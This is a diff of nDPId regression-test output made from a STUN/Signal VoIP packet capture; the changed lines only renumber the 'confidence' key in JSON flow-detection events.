@@ -47,10 +47,10 @@ 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":61,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1636901956921,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1636901956921,"pkt":"CL6sCxdumt9Y+uvcCABFAAAwevJAAEARy\/zAqAyprP15f5wOS2YAHEUhAAEAACESpEJOVFU1cXVJU2dZVFA="} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":62,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1636901956929,"flow_last_seen":1636901956929,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1636901956929,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.183.167","src_port":39950,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":62,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1636901956929,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1636901956929,"pkt":"CL6sCxdumt9Y+uvcCABFAAAwnuJAAEAR80PAqAypI563p5wOAbsAHAwRAAEAACESpEJneHI1SHRPK0tqKzc="} 
-00796{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":62,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1636901956929,"flow_last_seen":1636901956929,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1636901956929,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.183.167","src_port":39950,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"STUN.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00796{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":62,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1636901956929,"flow_last_seen":1636901956929,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1636901956929,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.183.167","src_port":39950,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"5":"DPI (cache)"},"proto":"STUN.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 
00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":63,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1636901956930,"flow_last_seen":1636901956930,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1636901956930,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.183.167","src_port":39950,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":63,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1636901956930,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1636901956930,"pkt":"CL6sCxdumt9Y+uvcCABFAAAwnuNAAEAR80LAqAypI563p5wODZYAHNwWAAEAACESpEI1alVGbDBvdmFLRGs="} -00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":63,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1636901956930,"flow_last_seen":1636901956930,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1636901956930,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.183.167","src_port":39950,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.SignalVoip","breed":"Acceptable","category":"VoIP"}} 
+00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":63,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1636901956930,"flow_last_seen":1636901956930,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1636901956930,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.183.167","src_port":39950,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.SignalVoip","breed":"Acceptable","category":"VoIP"}} 00553{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":65,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1636901956946,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":92,"thread_ts_msec":1636901956946,"pkt":"mt9Y+uvcCL6sCxduCABFAABwP65AAOQRrjcjnrenwKgMqQ2WnA4AXORTAQEAQCESpEI1alVGbDBvdmFLRGsAIAAIAAEPlXw9RVEAAQAIAAEuh10v4ROAKwAIAAENliOet6eALAAIAAEAUCOet6eAIgAETm9uZYAoAAT10UAM"} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":66,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1636901956960,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1636901956960,"pkt":"CL6sCxdumt9Y+uvcCABFAAA4nuZAAEAR8zfAqAypI563p6g8AbsAJMHVAAMACCESpEJwYTVMazRiQkhvWTEAGQAEEQAAAA=="} 
00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":67,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1636901956962,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1636901956962,"pkt":"CL6sCxdumt9Y+uvcCABFAAA4nudAAEAR8zbAqAypI563p5wODZYAJOqGAAMACCESpEJuWjVNSmNUejZrc3YAGQAEEQAAAA=="} 
@@ -66,15 +66,15 @@ 00573{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":96,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1636901958294,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":138,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":138,"pkt_l4_len":104,"thread_ts_msec":1636901958294,"pkt":"CL6sCxdumt9Y+uvcCABFAAB8azVAAEARa5jAqAypEsODj6g87uQAaP5FAAEATCESpEJyRHdyaGtEci8vOWUABgAJV0pzdTptTndxAAAAwFcABAADAAqAKgAIbYcgPZwg8UAAJAAEbn8e\/wAIABR\/b\/AcoEEqLjwzw3SbmvWontQU34AoAARPt0SR"} 00531{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":100,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1636901958378,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":106,"pkt_l4_len":72,"thread_ts_msec":1636901958378,"pkt":"mt9Y+uvcCL6sCxduCABFSABcrnFAAAMRZTQSw4OPwKgMqe7kqDwASOO3AQEALCESpEJyRHdyaGtEci8vOWUAIAAIAAEPmHw9RVEACAAUZTe+q2TI1x26\/6LLBdUUDVZaZoOAKAAEsQfEQQ=="} 00572{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":101,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1636901958378,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":138,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":138,"pkt_l4_len":104,"thread_ts_msec":1636901958378,"pkt":"mt9Y+uvcCL6sCxduCABFSAB8rnJAAAMRZRMSw4OPwKgMqe7kqDwAaODiAAEATCESpEJ2dFg5dWZIQUdCakMABgAJbU53cTpXSnN1AAAAwFcABAADA4SAKQAIQYCdgvFBqWUAJAAEbn8g\/wAIABSzQMYtF7YKfV2BCR2ZgRKFjKrZ7YAoAASRLc2k"} 
-00792{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":101,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1636901958294,"flow_last_seen":1636901958378,"flow_idle_time":200000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":256,"flow_avg_l4_payload_len":85,"midstream":0,"thread_ts_msec":1636901958378,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"18.195.131.143","src_port":43068,"dst_port":61156,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00793{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":208,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1636901956900,"flow_last_seen":1636901967279,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":124,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1636901967279,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"172.253.121.127","src_port":43068,"dst_port":19302,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 
-00799{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":215,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1636901956921,"flow_last_seen":1636901967684,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1636901967684,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"172.253.121.127","src_port":39950,"dst_port":19302,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.GoogleHangoutDuo","breed":"Acceptable","category":"VoIP"}} +00792{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":101,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1636901958294,"flow_last_seen":1636901958378,"flow_idle_time":200000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":256,"flow_avg_l4_payload_len":85,"midstream":0,"thread_ts_msec":1636901958378,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"18.195.131.143","src_port":43068,"dst_port":61156,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"STUN.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 
+00793{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":208,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1636901956900,"flow_last_seen":1636901967279,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":124,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1636901967279,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"172.253.121.127","src_port":43068,"dst_port":19302,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"STUN.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00799{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":215,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1636901956921,"flow_last_seen":1636901967684,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1636901967684,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"172.253.121.127","src_port":39950,"dst_port":19302,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"STUN.GoogleHangoutDuo","breed":"Acceptable","category":"VoIP"}} 
00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":289,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1636901998588,"flow_last_seen":1636901998588,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1636901998588,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"172.253.121.127","src_port":47767,"dst_port":19302,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":289,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1636901998588,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1636901998588,"pkt":"CL6sCxdumt9Y+uvcCABFAAAwgdlAAEARxRXAqAyprP15f7qXS2YAHLUpAAEAACESpEJFRDdhYWpCejZ6NGY="} -00798{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":289,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1636901998588,"flow_last_seen":1636901998588,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1636901998588,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"172.253.121.127","src_port":47767,"dst_port":19302,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.GoogleHangoutDuo","breed":"Acceptable","category":"VoIP"}} 
+00798{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":289,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1636901998588,"flow_last_seen":1636901998588,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1636901998588,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"172.253.121.127","src_port":47767,"dst_port":19302,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"STUN.GoogleHangoutDuo","breed":"Acceptable","category":"VoIP"}} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":290,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1636901998589,"flow_last_seen":1636901998589,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1636901998589,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"172.253.121.127","src_port":37970,"dst_port":19302,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":290,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1636901998589,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1636901998589,"pkt":"CL6sCxdumt9Y+uvcCABFAAAwgdpAAEARxRTAqAyprP15f5RSS2YAHI3jAAEAACESpEJHZko4WW5Ca1ZEVTk="} 
-00798{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":290,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1636901998589,"flow_last_seen":1636901998589,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1636901998589,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"172.253.121.127","src_port":37970,"dst_port":19302,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.GoogleHangoutDuo","breed":"Acceptable","category":"VoIP"}} +00798{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":290,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1636901998589,"flow_last_seen":1636901998589,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1636901998589,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"172.253.121.127","src_port":37970,"dst_port":19302,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"STUN.GoogleHangoutDuo","breed":"Acceptable","category":"VoIP"}} 
00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":291,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1636901998637,"flow_last_seen":1636901998637,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1636901998637,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.122.211","src_port":47767,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":291,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1636901998637,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1636901998637,"pkt":"CL6sCxdumt9Y+uvcCABFAAAw3EdAAEAR8rLAqAypI55607qXAbsAHB+DAAEAACESpEJDTUpIUUxOenE3VDQ="} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":292,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1636901998637,"flow_last_seen":1636901998637,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1636901998637,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.122.211","src_port":37970,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
@@ -88,56 +88,56 @@ 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":297,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1636901998654,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1636901998654,"pkt":"CL6sCxdumt9Y+uvcCABFAAA43E1AAEAR8qTAqAypI55605RSDZYAJBd3AAMACCESpEJOTG9MWFNjWDdLU3cAGQAEEQAAAA=="} 00559{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":298,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1636901998654,"flow_last_seen":1636901998654,"flow_idle_time":140000,"flow_min_l4_payload_len":56,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1636901998654,"l3_proto":"ip4","src_ip":"35.158.122.211","dst_ip":"192.168.12.169","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3} 00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":298,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1636901998654,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1636901998654,"pkt":"mt9Y+uvcCL6sCxduCABFAABMVVMAAOMBFpsjnnrTwKgMqQMDaO0AAAAARQAAMNxHQAAgERKzwKgMqSOeetO6lwG7ABwfgwABAAAhEqRCQ01KSFFMTnpxN1Q0"} 
-00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":298,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1636901998654,"flow_last_seen":1636901998654,"flow_idle_time":140000,"flow_min_l4_payload_len":56,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1636901998654,"l3_proto":"ip4","src_ip":"35.158.122.211","dst_ip":"192.168.12.169","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":5.050556} +00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":298,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1636901998654,"flow_last_seen":1636901998654,"flow_idle_time":140000,"flow_min_l4_payload_len":56,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1636901998654,"l3_proto":"ip4","src_ip":"35.158.122.211","dst_ip":"192.168.12.169","l4_proto":"icmp","ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":5.050556} 00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":299,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1636901998654,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1636901998654,"pkt":"mt9Y+uvcCL6sCxduCABFAABMVVQAAOMBFpojnnrTwKgMqQMDaO0AAAAARQAAMNxIQAAgERKywKgMqSOeetOUUgG7ABwljAABAAAhEqRCVjVicmFhSFdCOW5q"} 
00516{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":300,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1636901998657,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"thread_ts_msec":1636901998657,"pkt":"mt9Y+uvcCL6sCxduCABFAABUVVUAAOMBFpEjnnrTwKgMqQMDaPUAAAAARQAAONxJQAAgERKpwKgMqSOeetO6lwG7ACSHhgADAAghEqRCdG90WXN0M3RzbnZtABkABBEAAAA="} 00567{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":301,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1636901998660,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1636901998660,"pkt":"mt9Y+uvcCL6sCxduCABFIAB49klAAOMRNUgjnnrTwKgMqQ2WupcAZEK5ARMASCESpEJRck1mY3NySEUrbG4ACQAQAAAEAVVuYXV0aG9yaXplZAAVABA0YTlmNTljZmZlODk0NGE5ABQACnNpZ25hbC5vcmcAAIAiAAROb25lgCgABLOFpWg="} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":301,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1636901998644,"flow_last_seen":1636901998660,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":92,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1636901998660,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.122.211","src_port":47767,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.SignalVoip","breed":"Acceptable","category":"VoIP"}} 
+00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":301,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1636901998644,"flow_last_seen":1636901998660,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":92,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1636901998660,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.122.211","src_port":47767,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.SignalVoip","breed":"Acceptable","category":"VoIP"}} 